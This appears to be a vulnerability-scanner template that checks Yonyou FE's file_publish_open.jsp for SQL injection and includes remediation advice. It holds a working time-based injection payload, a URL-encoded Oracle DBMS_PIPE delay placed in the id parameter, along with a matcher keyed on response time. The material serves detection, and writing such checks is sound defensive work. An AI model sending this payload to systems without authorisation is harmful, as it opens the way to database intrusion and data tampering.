id: yonyouFE-SQLI-file_publish_open
info:
  name: Yonyou FE file_publish_open SQL Injection
  author:
  - 折跃
  description: |-
    Yonyou FE Collaboration Office Platform file_publish_open.jsp SQL injection vulnerability
    The FE business collaboration platform has a SQL injection vulnerability. An attacker can exploit it to execute SQL statements to view, add, modify, or delete data in the database.
  severity: high
  remediation: |-
    Official fix:
    1. It is recommended that users obtain the latest patch or latest version from the official website:
    https://www.yonyou.com/

    Temporary fix:
    1. Use prepared statements. When using PDO, do not directly concatenate variables into PDO statements. Use the parameterized query interface provided by the database for all query statements; parameterized statements use parameters instead of embedding user-supplied variables into SQL statements. Almost all database systems currently provide a parameterized SQL execution interface, which can very effectively prevent SQL injection attacks.
    2. Escape or encode special characters that enter the database, or convert their encoding.
    3. Confirm the type of each data value; for example, numeric data must be numeric, and corresponding database storage fields must be of integer type.
    4. Strictly limit data lengths, which to some extent prevents overly long SQL injection statements from executing correctly.
    5. Unify the encoding of every data layer of the website; UTF-8 is recommended for all. Inconsistent encoding between layers may allow some filtering models to be bypassed.
    6. Strictly limit the database operation privileges of website user accounts, granting only the minimum privileges needed for their work, thereby maximizing the reduction of harm caused by injection attacks to the database.
    7. Avoid displaying SQL error messages on the website, such as type errors or field mismatches, to prevent attackers from using these error messages to make judgments.
    8. Filter dangerous characters, for example: use regular expressions to match keywords such as union, sleep, and, select, and load_file, and terminate execution if any are matched.
requests:
- matchers:
  - type: dsl
    condition: and
    dsl:
    - status_code==200
    - duration >= 5
  path:
  - '{{BaseURL}}/document/file_publish_open.jsp?id=1%29%20AND%201387%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2886%29%7C%7CCHR%2875%29%7C%7CCHR%2886%29%7C%7CCHR%28116%29%2C5%29--'
  method: GET
  headers:
    Host: '{{Hostname}}'
  req-condition: true
